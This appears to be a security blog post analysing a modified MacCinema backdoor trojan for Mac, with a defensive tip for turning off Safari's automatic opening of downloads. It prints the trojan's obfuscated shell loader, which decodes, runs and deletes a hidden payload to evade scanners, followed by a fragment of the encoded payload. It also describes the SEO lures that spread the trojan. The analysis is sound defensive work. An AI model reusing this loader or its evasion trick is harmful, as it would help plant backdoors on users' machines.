Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.
The script looks like this:
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 |
sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//'
| tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' |
sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh
`uname -p` && rm `uname -p` && exit
``@"R5V9IY&(W<[email protected])78S178F%F"-EC)95D(&!F*J44,[email protected]%$*H
"%$8X0"*"93505D*U4%+T,[email protected]\@5,F`F0J02(`AB0!!&[email protected]"2J040PH03M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%[email protected]([email protected]+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.
Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below.
…while other links to Mac videos like this PornTube below.
There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.